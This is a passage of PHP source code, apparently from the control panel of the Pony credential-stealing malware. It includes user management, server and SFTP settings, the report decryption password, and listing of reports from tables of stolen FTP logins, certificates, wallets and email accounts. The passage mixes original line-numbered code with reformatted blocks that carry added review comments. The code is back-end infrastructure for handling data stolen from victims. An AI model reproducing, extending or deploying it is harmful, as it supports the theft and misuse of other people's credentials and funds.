        // URL-encoded. Because of the 'elseif', filter_has_passwords is carried over only when
        // filter_nonparsed is empty.
  1489. $filter = '';
  1490. if (strlen($filter_string))
  1491. $filter .= '&filter_string='.htmlspecialchars($filter_string, ENT_QUOTES, 'cp1251');
  1492. if (strlen($filter_ip))
  1493. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
  1494. if (strlen($filter_hwid))
  1495. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
  1496.  
  1497. if (strlen($filter_nonparsed))
  1498. $filter .= '&filter_nonparsed='.htmlspecialchars($filter_nonparsed, ENT_QUOTES, 'cp1251');
  1499. elseif (strlen($filter_has_passwords))
  1500. $filter .= '&filter_has_passwords='.htmlspecialchars($filter_has_passwords, ENT_QUOTES, 'cp1251');
  1501.  
  1502. SmartyPaginate::disconnect();
  1503. SmartyPaginate::connect();
  1504. SmartyPaginate::setURL($self_file."?action=reports".$filter);
  1505. SmartyPaginate::setTotal($total_items_count);
  1506. SmartyPaginate::setLimit($max_results);
  1507. SmartyPaginate::setPageLimit(50);
  1508.  
  1509. SmartyPaginate::setPrevText($lang['Previous']);
  1510. SmartyPaginate::setNextText($lang['Next']);
  1511. SmartyPaginate::assign($smarty);
  1512.  
  1513. smarty_assign_common_vars($smarty, $pony_db);
  1514. $smarty->assign("report_list", $report_list);
  1515. $smarty->display('report_list.tpl');
  1516. }
  1517. }
  1518. else if ($admin_action == 'admin')
  1519. {
  1520. // ---------------------------------------------------------------------------------------
  1521. // User management
  1522.  
  1523. if ($admin_routine == 'rebuild_tables')
  1524. {
  1525. if ($pony_db->priv_is_admin())
  1526. {
  1527. if ($pony_db->drop_table(CPONY_FTP_TABLE) && $pony_db->drop_table(CPONY_REPORT_TABLE) && $pony_db->drop_table(CPONY_REPORT_DATA_TABLE) &&
  1528. $pony_db->drop_table(CPONY_LOG_TABLE) && $pony_db->drop_table(CPONY_CERT_TABLE) && $pony_db->drop_table(CPONY_WALLET_TABLE) && $pony_db->drop_table(CPONY_EMAIL_TABLE) &&
  1529. $pony_db->drop_table(CPONY_DOMAINLIST_TABLE) &&
  1530. $pony_db->create_data_tables()
  1531. && $pony_db->state)
  1532. show_smarty_success($smarty);
  1533. else
  1534. show_smarty_error($smarty);
  1535. clear_floating_offsets($pony_db);
  1536. } else
  1537. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1538. }
  1539. elseif ($admin_routine == 'optimize_tables')
  1540. {
  1541. if ($pony_db->priv_is_admin())
  1542. {
  1543. if ($pony_db->optimize_table(CPONY_FTP_TABLE) && $pony_db->optimize_table(CPONY_REPORT_TABLE) && $pony_db->optimize_table(CPONY_REPORT_DATA_TABLE) && $pony_db->optimize_table(CPONY_DOMAIN_TABLE) &&
  1544. $pony_db->optimize_table(CPONY_LOG_TABLE) && $pony_db->optimize_table(CPONY_USER_TABLE) && $pony_db->optimize_table(CPONY_CERT_TABLE) && $pony_db->optimize_table(CPONY_WALLET_TABLE) && $pony_db->optimize_table(CPONY_EMAIL_TABLE) &&
  1545. $pony_db->optimize_table(CPONY_DOMAINLIST_TABLE)
  1546. && $pony_db->state)
  1547. show_smarty_success($smarty);
  1548. else
  1549. show_smarty_error($smarty);
  1550. clear_floating_offsets($pony_db);
  1551. } else
  1552. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1553. }
  1554. elseif ($admin_routine == 'delete')
  1555. {
  1556. if ($pony_db->priv_is_admin())
  1557. {
  1558. if ($pony_db->delete_user(trim(assign($_REQUEST['user_id']))))
  1559. show_smarty_success($smarty);
  1560. else
  1561. show_smarty_error($smarty);
  1562. } else
  1563. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1564. } elseif ($admin_routine == 'add')
  1565. {
  1566. $priv = trim(assign($_REQUEST['privileges']));
  1567. $new_login = trim(assign($_REQUEST['new_login']));
  1568. $new_password = trim(assign($_REQUEST['new_password']));
  1569.  
  1570. if ($priv != 'user_all')
  1571. $priv = 'user_view_only';
  1572.  
  1573. if ($pony_db->priv_is_admin())
  1574. {
  1575. if ($pony_db->add_user($new_login, $new_password, $priv))
  1576. show_smarty_success($smarty);
  1577. else
  1578. show_smarty_error($smarty);
  1579. } else
  1580. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1581. } else if ($admin_routine == 'edit')
  1582. {
  1583. $user_id = trim(assign($_REQUEST['user_id']));
  1584. $priv = trim(assign($_REQUEST['privileges']));
  1585. $new_password = trim(assign($_REQUEST['new_password']));
  1586.  
  1587. if ($new_password == 'current_HASH_value')
  1588. $new_password = '';
  1589.  
  1590. if ($priv != 'user_all')
  1591. $priv = 'user_view_only';
  1592.  
  1593. if ($pony_db->priv_is_admin())
  1594. {
  1595. if ($pony_db->update_user($user_id, $new_password, $priv))
  1596. show_smarty_success($smarty);
  1597. else
  1598. show_smarty_error($smarty);
  1599. } else
  1600. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1601. } else if ($admin_routine == 'update_server_settings')
  1602. {
  // Server settings: only an admin session may change the stored options.
  if (!$pony_db->priv_is_admin()) {
      show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  } else {
      // New report password, taken from the request and trimmed.
      $report_password = trim(assign($_REQUEST['report_password']));

      // An empty sftp_user is stored as '0'; the other two options fall
      // back to an empty string.
      $sftp_user = trim(assign($_REQUEST['sftp_user']));
      $sftp_user = strlen($sftp_user) ? $sftp_user : '0';

      $sftp_port = trim(assign($_REQUEST['sftp_port']));
      $sftp_port = strlen($sftp_port) ? $sftp_port : '';

      $sftp_protocol = trim(assign($_REQUEST['sftp_protocol']));
      $sftp_protocol = strlen($sftp_protocol) ? $sftp_protocol : '';

      // The four writes short-circuit: the first set_option() that fails
      // stops the chain, so earlier options may already have been saved
      // when the error page is shown.
      $all_saved = $pony_db->set_option('report_password', $report_password)
          && $pony_db->set_option('sftp_user', $sftp_user)
          && $pony_db->set_option('sftp_port', $sftp_port)
          && $pony_db->set_option('sftp_protocol', $sftp_protocol);

      if ($all_saved) {
          show_smarty_success($smarty);
      } else {
          show_smarty_error($smarty);
      }
  }
  1624. } else if ($admin_routine == 'change_password')
  1625. {
  // "change_password" routine: the logged-in account changes its own
  // password. No admin check is made in this branch; the gate is knowledge
  // of the current password.
  $current_password = trim(assign($_REQUEST['current_password']));
  $new_password = trim(assign($_REQUEST['new_password']));
  $confirm_password = trim(assign($_REQUEST['confirm_password']));

  // Every failure path sends the user back to the change-password form.
  $change_pass_form_url = '?action=admin&amp;routine=change_pass_form';

  // Checks run in this order: current password, confirmation match,
  // non-empty new password, then the actual update.
  if (!$pony_db->check_password($current_password)) {
      show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', $change_pass_form_url);
  } elseif ($new_password != $confirm_password) {
      // NOTE(review): loose comparison, as in the original ==; two
      // numeric-looking strings that differ textually can compare equal.
      show_smarty_error($smarty, 'ERR_PASSWORD_MISMATCH', $change_pass_form_url);
  } elseif (!strlen($new_password)) {
      show_smarty_error($smarty, 'ERR_EMPTY_PASSWORD', $change_pass_form_url);
  } elseif ($pony_db->change_password($new_password)) {
      show_smarty_success($smarty);
  } else {
      // change_password() reported failure: generic error, same return link.
      show_smarty_error($smarty, '', $change_pass_form_url);
  }
  1646. }
  1647.  
  // "edit_form" routine: load one account so the template can pre-fill the
  // edit form. Nothing is written here.
  if ($admin_routine == 'edit_form') {
      $user_id = trim(assign($_REQUEST['user_id']));

      if ($pony_db->priv_is_admin()) {
          $user_data = $pony_db->get_user_data($user_id);

          // The row is exposed only when it is a non-empty array and its
          // stored privileges pass priv_is_user().
          // NOTE(review): presumably this keeps admin rows out of the
          // edit form — confirm in the pony_db class.
          $row_is_editable = is_array($user_data)
              && $user_data
              && $pony_db->priv_is_user($user_data['privileges']);

          if ($row_is_editable) {
              $smarty->assign('user_data', $user_data);
          }
      }
  }
  1660.  
  // Data for the management page. Non-admin sessions get an empty user
  // list and none of the server settings.
  $user_list = array();

  if ($pony_db->priv_is_admin()) {
      // get_user_list() fills $user_list in place.
      $pony_db->get_user_list($user_list);

      // The report decryption password is handed to the template, for
      // admin sessions only.
      $smarty->assign('report_password', $pony_db_report_password);

      // Current SFTP options; $pony_report_options is populated outside
      // this excerpt.
      foreach (array('sftp_user', 'sftp_port', 'sftp_protocol') as $option_name) {
          $smarty->assign($option_name, assign($pony_report_options[$option_name]));
      }
  }

  $smarty->assign('user_list', $user_list);
  $smarty->display('management.tpl');
  1674. }
  1675. else if ($admin_action == 'help')
  1676. {
  // ---------------------------------------------------------------------------------------
  // Help contents: list the name of every entry in $global_module_list.

  $module_names = array();

  // Index 2 of each module entry is used as its name; the list itself is
  // defined outside this excerpt.
  foreach ($global_module_list as $module) {
      $module_names[] = $module[2];
  }

  $smarty->assign('module_names', $module_names);
  $smarty->display('help.tpl');
  1688. }
  1689. else if (strlen($admin_action) == 0)
  1690. {
  // ---------------------------------------------------------------------------------------
  // Home page

  // Installation check: on failure show the configuration error, then call
  // install_check() again with both flags set, inside a wrapper <div>.
  // NOTE(review): presumably the second call prints the failing checks — confirm.
  if (!install_check(false, false)) {
      show_smarty_error($smarty, 'ERR_SRV_CONFIGURATION');
      echo '<div id="achtung" style="margin-bottom:20px">';
      install_check(true, true);
      echo '</div>';
  }

  // Latest logins: get_login_log() fills the list in place; the second
  // argument is 5 (presumably a row limit).
  $latest_login_list = array();
  $pony_db->get_login_log($latest_login_list, 5);

  // Annotate each login entry with the country derived from its IP address.
  foreach ($latest_login_list as $login_key => $login_item) {
      $latest_login_list[$login_key]['country_code'] = geo_ip_country_code($login_item['ip']);
      $latest_login_list[$login_key]['country_name'] = geo_ip_country_name($login_item['ip']);
  }

  $smarty->assign('login_list', $latest_login_list);

  // Domains: get_domains() fills the list in place.
  $domain_list = array();
  $pony_db->get_domains($domain_list);

  smarty_assign_common_vars($smarty, $pony_db);
  $smarty->assign('domain_list', $domain_list);

  $smarty->display('home.tpl');
  1722. }
  1723.  
  // Common page tail, run for every action: render the footer, unload the
  // 'trimwhitespace' output filter, then render the stopwatch template
  // without that filter.
  $smarty->display('footer.tpl');
  $smarty->unloadFilter('output', 'trimwhitespace');
  $smarty->display('stopwatch.tpl');